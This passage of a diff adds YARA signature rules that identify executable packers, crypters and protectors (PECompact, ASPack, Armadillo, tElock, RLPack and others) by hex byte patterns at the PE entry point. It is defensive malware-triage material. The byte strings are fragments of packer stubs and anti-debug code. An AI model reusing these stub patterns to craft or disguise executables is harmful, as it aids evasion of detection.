+		$a0 = { 55 8B EC B9 ?? 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? ?? 40 00 E8 ?? EA FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 BA ?? ?? 40 00 B8 ?? ?? 40 00 E8 63 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? ?? FF FF BA ?? ?? 40 00 8B C3 8B 0D ?? ?? 40 00 E8 ?? ?? FF FF C7 05 ?? ?? 40 00 0A 00 00 00 BB ?? ?? 40 00 BE ?? ?? 40 00 BF ?? ?? 40 00 B8 ?? ?? 40 00 BA 04 00 00 00 E8 ?? EB FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 0A F3 FF FF 89 03 83 3B 00 0F 84 F7 04 00 00 B8 ?? ?? 40 00 8B 16 E8 ?? E1 FF FF B8 ?? ?? 40 00 E8 ?? E0 FF FF 8B D0 8B 03 8B 0E E8 ?? ?? FF FF 8B C7 A3 ?? ?? 40 00 8D 55 EC 33 C0 E8 ?? D3 FF FF 8B 45 EC B9 ?? ?? 40 00 BA ?? ?? 40 00 E8 8B ED FF FF 3C 01 75 2B A1 }
+
+condition:
+		$a0
+}
+	
+	
+rule Crunchv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 18 00 00 00 8B C5 55 60 9C 2B 85 E9 06 00 00 89 85 E1 06 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateEXEProtector18SetiSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 FF 31 F6 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02Armadillo300Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule hmimyssPEPack01hmimys
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 83 ED 05 6A 00 FF 95 E1 0E 00 00 89 85 85 0E 00 00 8B 58 3C 03 D8 81 C3 F8 00 00 00 80 AD 89 0E 00 00 01 89 9D 63 0F 00 00 8B 4B 0C 03 8D 85 0E 00 00 8B 53 08 80 BD 89 0E 00 00 00 75 0C 03 8D 91 0E 00 00 2B 95 91 0E 00 00 89 8D 57 0F 00 00 89 95 5B 0F 00 00 8B 5B 10 89 9D 5F 0F 00 00 8B 9D 5F 0F 00 00 8B 85 57 0F 00 00 53 50 E8 B7 0B 00 00 89 85 73 0F 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 95 E9 0E 00 00 89 85 6B 0F 00 00 6A 04 68 00 10 00 00 68 D8 7C 00 00 6A 00 FF 95 E9 0E 00 00 89 85 6F 0F 00 00 8D 85 67 0F 00 00 8B 9D 73 0F 00 00 8B 8D 6B 0F 00 00 8B 95 5B 0F 00 00 83 EA 0E 8B B5 57 0F 00 00 83 C6 0E 8B BD 6F 0F 00 00 50 53 51 52 56 68 D8 7C 00 00 57 E8 01 01 00 00 8B 9D 57 0F 00 00 8B 03 3C 01 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv146
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 60 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02XCR011Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B F0 33 DB 83 C3 01 83 C0 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEPACKLINKv360v364v365or50121
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 ?? ?? ?? 8E C0 8B ?? ?? ?? 8B ?? 4F 8B F7 FD F3 A4 50 B8 ?? ?? 50 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SpecialEXEPasswordProtectorv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptor15Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? ?? EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeJoiner10Yoda
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 E8 E2 02 00 00 83 F8 FF 0F 84 6D 02 00 00 A3 0C 12 40 00 8B D8 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 E3 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1E 12 40 00 FF 35 08 12 40 00 E8 C4 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119DllaPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 89 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypKeyV56XKenonicControlsLtd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 00 75 07 6A 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Safe20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 10 53 56 57 E8 C4 01 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule MicrosoftVisualCV80
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 14 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB 94 00 00 00 53 6A 00 8B ?? ?? ?? ?? ?? FF D7 50 FF ?? ?? ?? ?? ?? 8B F0 85 F6 75 0A 6A 12 E8 ?? ?? ?? ?? 59 EB 18 89 1E 56 FF ?? ?? ?? ?? ?? 56 85 C0 75 14 50 FF D7 50 FF ?? ?? ?? ?? ?? B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MZ_Crypt10byBrainSt0rm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 25 14 40 00 8B BD 77 14 40 00 8B 8D 7F 14 40 00 EB 28 83 7F 1C 07 75 1E 8B 77 0C 03 B5 7B 14 40 00 33 C0 EB 0C 50 8A A5 83 14 40 00 30 26 58 40 46 3B 47 10 76 EF 83 C7 28 49 0B C9 75 D4 8B 85 73 14 40 00 89 44 24 1C 61 FF E0 }
+
+condition:
+		$a0
+}
+	
+	
+rule EPWv130
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 57 1E 56 55 52 51 53 50 2E 8C 06 08 00 8C C0 83 C0 10 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WindofCrypt10byDarkPressure
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 64 40 00 10 E8 28 EA FF FF 33 C0 55 68 CE 51 00 10 64 ?? ?? ?? ?? 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 F6 DB FF FF 8B 45 EC E8 12 E7 FF FF 50 E8 3C EA FF FF 8B D8 83 FB FF 0F 84 A6 00 00 00 6A 00 53 E8 41 EA FF FF 8B F0 81 EE 00 5E 00 00 6A 00 6A 00 68 00 5E 00 00 53 E8 52 EA FF FF B8 F4 97 00 10 8B D6 E8 2E E7 FF FF B8 F8 97 00 10 8B D6 E8 22 E7 FF FF 8B C6 E8 AB D8 FF FF 8B F8 6A 00 68 F0 97 00 10 56 A1 F4 97 00 10 50 53 E8 05 EA FF FF 53 E8 CF E9 FF FF B8 FC 97 00 10 BA E8 51 00 10 E8 74 EA FF FF A1 F4 97 00 10 85 C0 74 05 83 E8 04 8B 00 50 B9 F8 97 00 10 B8 FC 97 00 10 8B 15 F4 97 00 10 E8 D8 EA FF FF B8 FC 97 00 10 E8 5A EB FF FF 8B CE 8B 15 F8 97 00 10 8B C7 E8 EB E9 FF FF 8B C7 85 C0 74 05 E8 E4 EB FF FF 33 C0 5A 59 59 64 89 10 68 D5 51 00 10 8D 45 EC E8 BB E5 FF FF C3 E9 A9 DF FF FF EB F0 5F 5E 5B E8 B7 E4 FF FF 00 00 00 FF FF FF FF 0A 00 00 00 63 5A 6C 56 30 55 6C 6B 70 4D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTKrnlPackerAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01LCCWin321xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NME11Publicbyredlime
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 30 35 14 13 E8 9A E6 FF FF 33 C0 55 68 6C 36 14 13 64 FF 30 64 89 20 B8 08 5C 14 13 BA 84 36 14 13 E8 7D E2 FF FF E8 C0 EA FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 04 F8 FF FF 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 F4 F7 FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 2C F9 FF FF A3 F8 5A 14 13 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 17 F9 FF FF A3 FC 5A 14 13 B8 04 5C 14 13 E8 20 FB FF FF 8B D8 85 DB 74 48 B8 00 5B 14 13 8B 15 C4 45 14 13 E8 1E E7 FF FF A1 04 5C 14 13 E8 A8 DA FF FF ?? ?? ?? ?? 5C 14 13 50 8B CE 8B D3 B8 00 5B 14 13 ?? ?? ?? ?? FF 8B C6 E8 DF FB FF FF 8B C6 E8 9C DA FF FF B8 00 5B 14 13 E8 72 E7 FF FF 33 C0 5A 59 59 64 89 10 68 73 36 14 13 C3 E9 0F DF FF FF EB F8 5E 5B E8 7E E0 FF FF 00 00 FF FF FF FF 0C 00 00 00 4E 4D 45 20 31 2E 31 20 53 74 75 62 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEtitev13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv134v140b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 00 80 ?? 40 90 90 01 85 9E 80 ?? 40 BB F8 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeMSVC70DLLMethod3emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC }
+	$a1 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SoftProtectSoftProtectbyru
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 60 E8 03 ?? ?? ?? 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 EB 01 83 9C EB 01 D5 EB 08 35 9D EB 01 89 EB 03 0B EB F7 E8 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 59 83 01 01 80 39 5C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02CDCopsIIAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 ?? 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv108xAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BorlandCDLLMethod2Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtector01bySMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock099cPrivateECLIPSEtE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 3F DF FF FF 00 00 00 ?? ?? ?? ?? 04 ?? ?? 00 00 00 00 00 00 00 00 00 24 ?? ?? 00 14 ?? ?? 00 0C ?? ?? 00 00 00 00 00 00 00 00 00 31 ?? ?? 00 1C ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 3C ?? ?? 00 00 00 00 00 4F ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 75 73 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XPack152164
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B EC FA 33 C0 8E D0 BC ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv123RC4build0807dllAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov253b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 D8 ?? ?? ?? 68 14 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Imploderv104BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev100v101BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? 02 00 00 8B 44 24 04 52 48 66 31 C0 66 81 38 4D 5A 75 F5 8B 50 3C 81 3C 02 50 45 00 00 75 E9 5A C2 04 00 60 89 DD 89 C3 8B 45 3C 8B 54 28 78 01 EA 52 8B 52 20 01 EA 31 C9 41 8B 34 8A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule JExeCompressor10byArashVeyskarami
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8D 2D D3 4A E5 14 0F BB F7 0F BA E5 73 0F AF D5 8D 0D 0C 9F E6 11 C0 F8 EF F6 DE 80 DC 5B F6 DA 0F A5 C1 0F C1 F1 1C F3 4A 81 E1 8C 1F 66 91 0F BE C6 11 EE 0F C0 E7 33 D9 64 F2 C0 DC 73 0F C0 D5 55 8B EC BA C0 1F 41 00 8B C2 B9 97 00 00 00 80 32 79 50 B8 02 00 00 00 50 03 14 24 58 58 51 2B C9 B9 01 00 00 00 83 EA 01 E2 FB 59 E2 E1 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Alloy4xPGWareLLC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 6A 04 68 00 10 00 00 68 00 02 00 00 6A 00 FF 95 A8 33 40 00 0B C0 0F 84 F6 01 00 00 89 85 2E 33 40 00 83 BD E8 32 40 00 01 74 0D 83 BD E4 32 40 00 01 74 2A 8B F8 EB 3E 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallV2403Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 }
+	$a1 = { 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 57 BF 00 00 80 00 39 79 14 77 36 53 56 8B B1 29 04 00 00 8B 41 0C 8B 59 10 03 DB 8A 14 30 83 E2 01 0B D3 C1 E2 07 40 89 51 10 89 41 0C 0F B6 04 30 C1 61 14 08 D1 E8 09 41 10 39 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FakeNinjav28AntiDebugSpirit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 18 00 00 00 EB 02 C3 11 8B 40 30 EB 01 0F 0F B6 40 02 83 F8 01 74 FE EB 01 E8 90 C0 FF FF EB 03 BD F4 B5 64 A1 30 00 00 00 0F B6 40 02 74 01 BA 74 E0 50 00 64 A1 30 00 00 00 83 C0 68 8B 00 EB 00 83 F8 70 74 CF EB 02 EB FE 90 90 90 0F 31 33 C9 03 C8 0F 31 2B C1 3D FF 0F 00 00 73 EA E8 08 00 00 00 C1 3D FF 0F 00 00 74 AA EB 07 E8 8B 40 30 EB 08 EA 64 A1 18 00 00 00 EB F2 90 90 90 BA ?? ?? ?? ?? FF E2 64 11 40 00 FF 35 84 11 40 00 E8 40 11 00 00 6A 00 6A 00 FF 35 70 11 40 00 FF 35 84 11 40 00 E8 25 11 00 00 FF }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeLockv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 8C C8 8E C0 BE ?? ?? 26 ?? ?? 34 ?? 26 ?? ?? 46 81 ?? ?? ?? 75 ?? 40 B3 ?? B3 ?? F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitevxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EnigmaProtector10XSukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ?? ?? 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 C4 04 EB 02 ?? ?? 60 E8 24 00 00 00 00 00 ?? EB 02 ?? ?? 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 ?? ?? 89 C4 61 EB 2E ?? ?? ?? ?? ?? ?? ?? EB 01 ?? 31 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 ?? 58 61 EB 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallEmbedded27172719Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
